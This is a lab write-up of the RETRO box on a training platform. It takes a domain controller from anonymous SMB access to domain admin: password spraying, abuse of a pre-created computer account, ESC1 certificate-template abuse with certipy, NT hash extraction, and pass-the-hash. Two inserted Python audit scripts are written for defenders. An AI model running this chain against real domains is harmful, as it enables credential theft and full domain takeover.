Here are my notes on the RETRO box from Vulnlab, which was deployed to Hack The Box yesterday.
RETRO: 10.10.80.215
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# sudo impacket-rpcdump @10.10.80.215 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# smbclient -N -L 10.10.80.215
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC - Anonymous Access
NETLOGON Disk Logon server share
Notes Disk Access-Denied
SYSVOL Disk Logon server share
Trainees Disk Anonymous Access
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# smbclient \\\\10.10.80.215\\Trainees -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
Important.txt A 288 Sun Jul 23 18:00:13 2023
6261499 blocks of size 4096. 2186444 blocks available
smb: \> get "Important.txt"
getting file \Important.txt of size 288 as Important.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
IPC$ Enumeration:
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# cat users.txt
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
crackmapexec smb 10.10.80.215 -u users.txt -p users.txt --continue-on-success # Spray every username as its own password, following the hint in Important.txt.
SMB 10.10.80.215 445 DC [+] retro.vl\trainee:trainee # The only pair that works.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u trainee -p trainee --shares
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.80.215 445 DC [+] Enumerated shares
SMB 10.10.80.215 445 DC Share Permissions Remark
SMB 10.10.80.215 445 DC ----- ----------- ------
SMB 10.10.80.215 445 DC ADMIN$ Remote Admin
SMB 10.10.80.215 445 DC C$ Default share
SMB 10.10.80.215 445 DC IPC$ READ Remote IPC
SMB 10.10.80.215 445 DC NETLOGON READ Logon server share
SMB 10.10.80.215 445 DC Notes READ
SMB 10.10.80.215 445 DC SYSVOL READ Logon server share
SMB 10.10.80.215 445 DC Trainees READ
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# smbclient \\\\10.10.80.215\\Notes -U "trainee"
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 18:03:16 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
6261499 blocks of size 4096. 2184874 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
- No Kerberoasting or AS-REP roasting.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u BANKING$ -p banking
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
BANKING$ is a pre-created computer account.
Pre-created computer account references:
https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
https://www.optiv.com/insights/source-zero/blog/diving-deeper-pre-created-computer-accounts
https://github.com/garrettfoster13/pre2k
https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/pre-created-computers-abuse
https://www.thehacker.recipes/ad/movement/domain-settings/pre-windows-2000-computers
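As an added, defender-side example (not pre2k's code and not part of the original notes): a small audit that flags computer objects that look pre-created, so they can be reset or disabled before anyone tests the lowercase-hostname password. The LDAP-style records, attribute names and the helper functions are constructed for the example.

```python
"""Hypothetical audit for pre-created ("pre-Windows 2000") computer accounts.

Added example, not pre2k's code. It runs over constructed LDAP-style records;
in a real audit the same attributes come from an LDAP search for
objectCategory=computer, and hits are reset or disabled rather than used.
"""
# userAccountControl bits (MS-ADTS / MS-SAMR names).
UF_PASSWD_NOTREQD = 0x0020             # set when "pre-Windows 2000 computer" is ticked
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000  # ordinary member computer
UF_SERVER_TRUST_ACCOUNT = 0x2000       # domain controller
# 4128: the userAccountControl value such accounts are created with.
PRE2000_UAC = UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD

def looks_pre_created(acct):
    """Heuristic: a workstation object carrying PASSWD_NOTREQD that has never
    authenticated (logonCount == 0), i.e. created in AD but never joined."""
    uac = acct["userAccountControl"]
    if uac & UF_SERVER_TRUST_ACCOUNT or not uac & UF_WORKSTATION_TRUST_ACCOUNT:
        return False
    return bool(uac & UF_PASSWD_NOTREQD) and acct.get("logonCount", 0) == 0

def audit_computers(accounts):
    """Return the sAMAccountNames that should be reset or disabled, sorted."""
    return sorted(a["sAMAccountName"] for a in accounts if looks_pre_created(a))

# Constructed records modelled on the objects seen in these notes.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "BANKING$", "userAccountControl": PRE2000_UAC, "logonCount": 0},
    {"sAMAccountName": "DC$", "userAccountControl": 0x82000, "logonCount": 0},  # SERVER_TRUST | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "logonCount": 57},  # joined workstation
    {"sAMAccountName": "WS02$", "userAccountControl": 0x1000, "logonCount": 0},   # joined, not yet logged on
]

if __name__ == "__main__":
    for name in audit_computers(SAMPLE_COMPUTERS):
        print(f"likely pre-created computer account: {name}")
```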
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# pre2k auth -u trainee -p trainee -d retro.vl -dc-ip 10.10.80.215 -verbose
[pre2k v3.0 banner - @garrfoster, @Tw1sm]
[15:09:51] INFO Retrieved 2 results total.
[15:09:51] INFO Testing started at 2023-12-26 15:09:51
[15:09:51] INFO Using 10 threads
[15:09:51] INFO VALID CREDENTIALS: retro.vl\BANKING$:banking
[15:09:51] DEBUG Invalid credentials: retro.vl\DC$:dc
Password change to clear "NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT" (the credential is valid, but the account cannot log on until its password is changed over Kerberos with kpasswd):
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = RETRO.VL
dns_lookup_realm = false
ticket_lifetime = 24h
renew_lifetime = 7d
rdns = false
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
[realms]
RETRO.VL = {
kdc = DC.RETRO.VL
admin_server = DC.RETRO.VL
}
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# kpasswd BANKING$
Password for BANKING$@RETRO.VL:
Enter new password:
Enter it again:
Password changed.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u BANKING$ -p 123
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [+] retro.vl\BANKING$:123
certipy find -vulnerable -stdout -u 'BANKING$@retro.vl' -p 123 -dc-ip 10.10.80.215
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
certipy req -username 'BANKING$@retro.vl' -password 123 -ca retro-DC-CA -target dc.retro.vl -template 'RetroClients' -upn 'administrator@retro.vl' -dns dc.retro.vl -key-size 4096 -debug
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
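As an added, defender-side example (not Certipy's code and not part of the original notes): a template audit that reproduces the three conditions behind the ESC1 line above and shows which single setting change on RetroClients would neutralise it. The template records and field names are constructed for the example; the flag bits and EKU OIDs are the real AD CS values.

```python
"""Hypothetical ESC1 audit over constructed certificate-template records.

Added example, not Certipy's code. It models the three conditions Certipy's
ESC1 line reports (low-privileged enrollment, enrollee-supplied subject,
authentication EKU) and the two template settings that neutralise them
(manager approval, required RA signatures), so each condition can be fixed.
"""
# msPKI-Certificate-Name-Flag bit: the requester chooses subject and SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request waits for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# EKUs that let the issued certificate authenticate to AD (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_reasons(t):
    """List the ESC1 conditions template record t meets; empty if it is not ESC1."""
    weak = {p.split("\\")[-1] for p in t["enroll"]} & LOW_PRIV
    reasons = []
    if weak:
        reasons.append("enrollable by " + ", ".join(sorted(weak)))
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    if not t["ekus"] or set(t["ekus"]) & AUTH_EKUS:  # no EKU = valid for any purpose
        reasons.append("allows client authentication")
    if len(reasons) < 3:
        return []
    blocked = bool(t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS) or t.get("ra_signatures", 0) > 0
    return [] if blocked else reasons

def audit_templates(templates):
    """Map each ESC1-vulnerable template name to the reasons it qualifies."""
    return {t["name"]: esc1_reasons(t) for t in templates if esc1_reasons(t)}

# Constructed template records; RetroClients mirrors the finding in these notes.
TEMPLATES = [
    {"name": "RetroClients", "enroll": ["RETRO.VL\\Domain Computers"], "name_flag": 0x1,
     "enrollment_flag": 0x0, "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "User", "enroll": ["RETRO.VL\\Domain Users"], "name_flag": 0xA6000000,  # CA builds subject from AD
     "enrollment_flag": 0x0, "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "RetroClients-Fixed", "enroll": ["RETRO.VL\\Domain Computers"], "name_flag": 0x1,
     "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS, "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"]},
]
```

Running `audit_templates(TEMPLATES)` reports only RetroClients; the `-Fixed` copy differs solely by requiring CA manager approval, which is the cheapest remediation when the template must keep enrollee-supplied subjects.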
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# sudo certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.80.215
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@retro.vl'
[1] DNS Host Name: 'dc.retro.vl'
> 0
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
sudo secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389' -no-pass retro.vl/'administrator'@dc.retro.vl
evil-winrm -i dc.retro.vl -u Administrator -H '252fac7066d93dd009d4fd2cd0368389' # Administrator shell!
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
ldap Version 3 - Access-Denied
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2023-12-25T19:05:19
|_Not valid after: 2024-06-25T19:05:19
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-12-26T19:11:26+00:00
|_ssl-date: 2023-12-26T19:12:05+00:00; 0s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
ROOT.TXT: VL{REDACTED}